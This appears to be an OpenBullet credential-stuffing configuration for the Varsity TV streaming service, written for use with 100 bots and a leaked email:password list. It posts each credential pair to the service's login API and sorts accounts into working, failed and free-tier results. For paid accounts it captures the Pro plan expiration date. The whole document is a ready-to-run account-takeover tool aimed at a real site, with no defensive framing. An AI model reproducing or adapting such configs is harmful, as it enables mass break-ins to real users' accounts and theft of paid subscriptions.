[SETTINGS]
{
  "Name": "Varsity TV",
  "SuggestedBots": 100,
  "LastModified": "2018-06-08T16:57:12.2236982+00:00",
  "AdditionalInfo": "Captures: Pro plans expiration date",
  "Author": "Rebel",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://tv-api.varsity.com/api/tokens" AutoRedirect=TRUE 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://tv.varsity.com/login" 
  HEADER "origin: https://tv.varsity.com" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "{\"user\":{\"" 
  KEYCHAIN Failure OR 
    KEY "Invalid credentials" 
    KEY "Username could not be found" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY ",\"user_subscriptions\":[]" 
    KEY "\"status\":\"cancelled\"" 
    KEY "\"status\":\"deleted\"" 
PARSE "<SOURCE>" LR "\"end_date\":\"" "T" Recursive=FALSE -> CAP "" "" "" 
